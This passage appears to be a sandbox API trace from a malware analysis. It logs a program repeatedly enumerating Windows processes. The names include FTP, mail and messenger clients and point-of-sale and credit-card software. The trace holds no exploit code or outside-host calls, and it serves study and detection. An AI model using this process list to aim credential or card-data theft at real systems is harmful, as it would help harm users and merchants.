Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0096.927] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0096.929] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0096.931] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0096.933] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0096.936] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0096.938] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0096.940] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0096.942] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0096.944] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0096.946] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0096.948] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0096.950] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0096.952] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0096.954] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0096.956] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0096.959] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0096.961] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0096.963] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0096.965] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0096.967] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0096.969] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0096.971] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0096.973] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0096.975] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0096.976] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0096.978] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0096.980] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0096.982] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0096.984] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0096.986] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0096.987] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0096.989] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0096.991] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0096.993] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0096.995] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0096.996] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0096.998] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0097.000] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0097.002] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0097.004] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0097.005] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0097.007] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.009] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0097.010] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0097.018] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0097.020] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0097.022] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xa80, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0097.024] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xa80, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0097.026] CloseHandle (hObject=0x1e74) returned 1 [0097.026] Sleep (dwMilliseconds=0x64) [0097.127] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e74 [0097.138] Process32First (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.139] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0097.141] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0097.142] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.145] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0097.146] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.148] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0097.149] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0097.151] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0097.153] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.155] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.156] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0097.158] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.159] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.161] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.163] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.164] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.166] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x53, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.167] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.169] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0097.170] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0097.172] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.174] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0097.175] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0097.242] Sleep (dwMilliseconds=0x64) [0097.396] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2334 [0097.408] Process32First (in: hSnapshot=0x2334, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.480] Sleep (dwMilliseconds=0x64) [0097.581] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8d0 [0097.592] Process32First (in: hSnapshot=0x8d0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.726] Sleep (dwMilliseconds=0x64) [0097.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8d0 [0097.844] Process32First (in: hSnapshot=0x8d0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.943] Sleep (dwMilliseconds=0x64) [0098.093] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2330 [0098.104] Process32First (in: hSnapshot=0x2330, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.244] Sleep (dwMilliseconds=0x64) [0098.345] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x234c [0098.358] Process32First (in: hSnapshot=0x234c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.458] Sleep (dwMilliseconds=0x64) [0098.603] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2330 [0098.614] Process32First (in: hSnapshot=0x2330, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.687] Sleep (dwMilliseconds=0x64) [0098.787] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x233c [0098.799] Process32First (in: hSnapshot=0x233c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, 